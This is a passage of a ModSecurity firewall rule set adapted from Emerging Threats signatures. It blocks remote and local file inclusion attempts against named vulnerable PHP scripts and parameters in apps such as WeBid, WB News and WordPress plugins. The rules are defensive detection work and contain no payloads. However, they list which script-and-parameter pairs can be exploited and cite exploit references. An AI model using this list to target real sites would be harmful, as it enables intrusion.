&TX:'/RFI.*ARGS:config[installdir]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WB News News.php config Parameter Remote File Inclusion -2',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009845) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WB News SendFriend.php config Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /base/SendFriend.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009845,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WB News SendFriend.php config Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,33434'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:config[installdir]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WB News SendFriend.php config Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009846) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WB News global.php config Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /admin/global.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009846,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WB News global.php config Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:config[installdir]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WB News global.php config Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008826) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Way Of The Warrior crea.php plancia Remote File Inclusion SecRule REQUEST_LINE "@contains crea.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008826,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Way Of The Warrior crea.php plancia Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:plancia/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Way Of The Warrior crea.php plancia Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009306) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WeBid cron.php include_path Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /cron.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009306,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WeBid cron.php include_path Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34074'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:include_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WeBid cron.php include_path Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009307) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WeBid cron.php include_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /cron.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009307,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WeBid cron.php include_path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,34074'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:include_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WeBid cron.php include_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009308) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WeBid ST_browsers.php include_path Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /ST_browsers.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009308,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WeBid ST_browsers.php include_path Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34074'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:include_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WeBid ST_browsers.php include_path Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009309) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WeBid ST_browsers.php include_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /ST_browsers.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009309,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WeBid ST_browsers.php include_path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,34074'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:include_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WeBid ST_browsers.php include_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009310) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WeBid ST_countries.php include_path Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /ST_countries.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009310,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WeBid ST_countries.php include_path Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34074'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:include_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WeBid ST_countries.php include_path Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009311) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WeBid ST_countries.php include_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /ST_countries.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009311,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WeBid ST_countries.php include_path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,34074'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:include_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WeBid ST_countries.php include_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009312) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WeBid ST_platforms.php include_path Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /ST_platforms.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009312,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WeBid ST_platforms.php include_path Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34074'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:include_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WeBid ST_platforms.php include_path Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009313) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WeBid ST_platforms.php include_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /ST_platforms.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009313,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WeBid ST_platforms.php include_path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,34074'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:include_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WeBid ST_platforms.php include_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010092) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Webradev Download Protect EmailTemplates.class.php Remote File Inclusion SecRule REQUEST_LINE "@contains /Framework/EmailTemplates.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010092,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Webradev Download Protect EmailTemplates.class.php Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:GLOBALS[RootPath]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Webradev Download Protect EmailTemplates.class.php Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010093) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Webradev Download Protect PDPEmailReplaceConstants.class.php Remote File Inclusion SecRule REQUEST_LINE "@contains /Customers/PDPEmailReplaceConstants.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010093,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Webradev Download Protect PDPEmailReplaceConstants.class.php Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:GLOBALS[RootPath]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Webradev Download Protect PDPEmailReplaceConstants.class.php Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010094) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Webradev Download Protect ResellersManager.class.php Remote File Inclusion SecRule REQUEST_LINE "@contains /Admin/ResellersManager.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010094,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Webradev Download Protect ResellersManager.class.php Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:GLOBALS[RootPath]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Webradev Download Protect ResellersManager.class.php Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009690) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebMoney html.php page Remote File Inclusion SecRule REQUEST_LINE "@contains /html.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009690,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WebMoney html.php page Remote File Inclusion',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0907-exploits/3awebmoney-rfi.txt'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:page/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebMoney html.php page Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009691) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WebMoney html2.php page Remote File Inclusion SecRule REQUEST_LINE "@contains /html2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009691,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS WebMoney html2.php page Remote File Inclusion',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0907-exploits/3awebmoney-rfi.txt'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:page/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WebMoney html2.php page Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008935) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Werner Hilversum FAQ Manager header.php config_path parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /include/header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008935,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Werner Hilversum FAQ Manager header.php config_path parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,32472'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:config_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Werner Hilversum FAQ Manager header.php config_path parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003696) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wikivi5 Remote Inclusion Attempt -- show.php sous_rep SecRule REQUEST_LINE "@contains /handlers/page/show.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003696,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Wikivi5 Remote Inclusion Attempt -- show.php sous_rep',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3863'" SecRule &TX:'/RFI.*ARGS:sous_rep/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wikivi5 Remote Inclusion Attempt -- show.php sous_rep',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003685) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress Remote Inclusion Attempt -- wptable-button.php wpPATH SecRule REQUEST_LINE "@contains /js/wptable-button.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003685,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress Remote Inclusion Attempt -- wptable-button.php wpPATH',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3824'" SecRule &TX:'/RFI.*ARGS:wpPATH/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress Remote Inclusion Attempt -- wptable-button.php wpPATH',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003686) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wordpress Remote Inclusion Attempt -- wordtube-button.php wpPATH SecRule REQUEST_LINE "@contains /wordtube-button.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003686,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Wordpress Remote Inclusion Attempt -- wordtube-button.php wpPATH',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3825'" SecRule &TX:'/RFI.*ARGS:wpPATH/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wordpress Remote Inclusion Attempt -- wordtube-button.php wpPATH',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010473) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS p-Table for WordPress wptable-tinymce.php ABSPATH Parameter RFI Attempt SecRule REQUEST_LINE "@contains /js/wptable-tinymce.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010473,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS p-Table for WordPress wptable-tinymce.php ABSPATH Parameter RFI Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:ABSPATH/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS p-Table for WordPress wptable-tinymce.php ABSPATH Parameter RFI Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009925) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script function_core.php web_root Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /includes/function_core.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009925,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script function_core.php web_root Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,31225'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:web_root/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script function_core.php web_root Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009926) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script function_core.php web_root Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /includes/function_core.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009926,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script function_core.php web_root Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,31225'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:web_root "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script function_core.php web_root Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009927) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script layout_lyrics.php web_root Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /templates/layout_lyrics.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009927,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script layout_lyrics.php web_root Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,31225'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:web_root/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script layout_lyrics.php web_root Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009928) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script layout_lyrics.php web_root Parameter Local file Inclusion SecRule REQUEST_LINE "@contains /templates/layout_lyrics.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009928,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script layout_lyrics.php web_root Parameter Local file Inclusion',tag:'web-application-attack',tag:'bugtraq,31225'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:web_root "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS x10 Automatic MP3 Script layout_lyrics.php web_root Parameter Local file Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009194) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS X7 Chat mini.php help_file Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /mini.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009194,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS X7 Chat mini.php help_file Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,31460'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:help_file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS X7 Chat mini.php help_file Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009870) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS XRMS CRM workflow-activities.php include_directory Remote File Inclusion SecRule REQUEST_LINE "@contains /activities/workflow-activities.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009870,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS XRMS CRM workflow-activities.php include_directory Remote File Inclusion',tag:'web-application-attack',tag:'cve,CVE-2008-3399'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:include_directory/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS XRMS CRM workflow-activities.php include_directory Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003517) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS iPhotoAlbum header.php remote file include SecRule REQUEST_LINE "@contains /header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003517,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS iPhotoAlbum header.php remote file include',tag:'web-application-attack',tag:'bugtraq,23189'" SecRule &TX:'/RFI.*ARGS:set_menu/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS iPhotoAlbum header.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009190) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS YACS update_trailer.php context Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /update_trailer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009190,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS YACS update_trailer.php context Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:context[path_to_root]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS YACS update_trailer.php context Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009191) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS YACS update_trailer.php context Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /update_trailer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009191,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS YACS update_trailer.php context Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:context[path_to_root] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS YACS update_trailer.php context Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011098) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS YaPig last_gallery.php YAPIG_PATH Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /last_gallery.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011098,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS YaPig last_gallery.php YAPIG_PATH Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:YAPIG_PATH/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS YaPig last_gallery.php YAPIG_PATH Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003739) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Yaap Remote Inclusion Attempt -- common.php root_path SecRule REQUEST_LINE "@contains /includes/common.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003739,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Yaap Remote Inclusion Attempt -- common.php root_path',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3908'" SecRule &TX:'/RFI.*ARGS:root_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Yaap Remote Inclusion Attempt -- common.php root_path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009316) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /class_yapbbcooker.php" 